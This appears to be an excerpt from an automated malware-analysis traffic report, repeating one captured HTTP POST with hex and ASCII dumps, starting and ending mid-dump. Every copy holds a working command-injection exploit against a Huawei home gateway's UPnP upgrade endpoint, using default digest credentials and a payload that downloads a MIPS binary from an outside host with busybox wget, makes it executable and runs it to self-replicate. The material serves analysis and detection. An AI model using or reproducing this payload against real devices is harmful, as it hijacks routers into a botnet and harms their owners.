64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 3b 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 68 75 61 77 65 69 2e 73 65 6c 66 72 65 70 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g x6arch.ml -l /tmp/.deathnet -r /d34/d34thn3t2.mips; /bin/busybox chmod 777 * /tmp/.deathnet; /tmp/.deathnet huawei.selfrep)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
        Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 78 36 61 72 63 68 2e 6d 6c 20 2d 6c 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 2d 72 20 2f 64 33 34 2f 64 33 34 74 68 6e 33 74 32 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 3b 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 68 75 61 77 65 69 2e 73 65 6c 66 72 65 70 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g x6arch.ml -l /tmp/.deathnet -r /d34/d34thn3t2.mips; /bin/busybox chmod 777 * /tmp/.deathnet; /tmp/.deathnet huawei.selfrep)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
        Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 78 36 61 72 63 68 2e 6d 6c 20 2d 6c 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 2d 72 20 2f 64 33 34 2f 64 33 34 74 68 6e 33 74 32 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 3b 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 68 75 61 77 65 69 2e 73 65 6c 66 72 65 70 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g x6arch.ml -l /tmp/.deathnet -r /d34/d34thn3t2.mips; /bin/busybox chmod 777 * /tmp/.deathnet; /tmp/.deathnet huawei.selfrep)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
        Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 78 36 61 72 63 68 2e 6d 6c 20 2d 6c 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 2d 72 20 2f 64 33 34 2f 64 33 34 74 68 6e 33 74 32 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 3b 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 68 75 61 77 65 69 2e 73 65 6c 66 72 65 70 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g x6arch.ml -l /tmp/.deathnet -r /d34/d34thn3t2.mips; /bin/busybox chmod 777 * /tmp/.deathnet; /tmp/.deathnet huawei.selfrep)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
        Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 78 36 61 72 63 68 2e 6d 6c 20 2d 6c 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 2d 72 20 2f 64 33 34 2f 64 33 34 74 68 6e 33 74 32 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 3b 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 68 75 61 77 65 69 2e 73 65 6c 66 72 65 70 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g x6arch.ml -l /tmp/.deathnet -r /d34/d34thn3t2.mips; /bin/busybox chmod 777 * /tmp/.deathnet; /tmp/.deathnet huawei.selfrep)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
        Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 78 36 61 72 63 68 2e 6d 6c 20 2d 6c 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 2d 72 20 2f 64 33 34 2f 64 33 34 74 68 6e 33 74 32 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 3b 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 68 75 61 77 65 69 2e 73 65 6c 66 72 65 70 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g x6arch.ml -l /tmp/.deathnet -r /d34/d34thn3t2.mips; /bin/busybox chmod 777 * /tmp/.deathnet; /tmp/.deathnet huawei.selfrep)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
        Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 78 36 61 72 63 68 2e 6d 6c 20 2d 6c 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 2d 72 20 2f 64 33 34 2f 64 33 34 74 68 6e 33 74 32 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 3b 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 68 75 61 77 65 69 2e 73 65 6c 66 72 65 70 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g x6arch.ml -l /tmp/.deathnet -r /d34/d34thn3t2.mips; /bin/busybox chmod 777 * /tmp/.deathnet; /tmp/.deathnet huawei.selfrep)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
        Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 78 36 61 72 63 68 2e 6d 6c 20 2d 6c 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 2d 72 20 2f 64 33 34 2f 64 33 34 74 68 6e 33 74 32 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 3b 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 68 75 61 77 65 69 2e 73 65 6c 66 72 65 70 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g x6arch.ml -l /tmp/.deathnet -r /d34/d34thn3t2.mips; /bin/busybox chmod 777 * /tmp/.deathnet; /tmp/.deathnet huawei.selfrep)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
        Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 78 36 61 72 63 68 2e 6d 6c 20 2d 6c 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 2d 72 20 2f 64 33 34 2f 64 33 34 74 68 6e 33 74 32 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 3b 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 68 75 61 77 65 69 2e 73 65 6c 66 72 65 70 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g x6arch.ml -l /tmp/.deathnet -r /d34/d34thn3t2.mips; /bin/busybox chmod 777 * /tmp/.deathnet; /tmp/.deathnet huawei.selfrep)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
        Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 78 36 61 72 63 68 2e 6d 6c 20 2d 6c 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 2d 72 20 2f 64 33 34 2f 64 33 34 74 68 6e 33 74 32 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 